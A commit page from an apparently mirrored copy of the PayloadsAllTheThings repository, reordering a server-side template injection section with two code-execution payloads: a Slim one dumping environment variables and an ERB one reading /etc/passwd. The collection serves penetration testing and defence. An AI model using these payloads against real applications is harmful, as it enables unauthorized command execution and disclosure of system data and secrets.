mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-01-17 23:25:29 -08:00
Sorting like basic injection part
This commit is contained in:
@@ -91,17 +91,16 @@ Slim:
|
||||
|
||||
### Code execution
|
||||
|
||||
Execute code using SSTI for Slim engine.
|
||||
|
||||
```powershell
|
||||
#{ %x|env| }
|
||||
```
|
||||
|
||||
Execute code using SSTI for ERB engine.
|
||||
|
||||
```ruby
|
||||
<%= system('cat /etc/passwd') %>
|
||||
```
|
||||
Execute code using SSTI for Slim engine.
|
||||
|
||||
```powershell
|
||||
#{ %x|env| }
|
||||
```
|
||||
|
||||
## Java
|
||||
|
||||
|
||||
Reference in New Issue
Block a user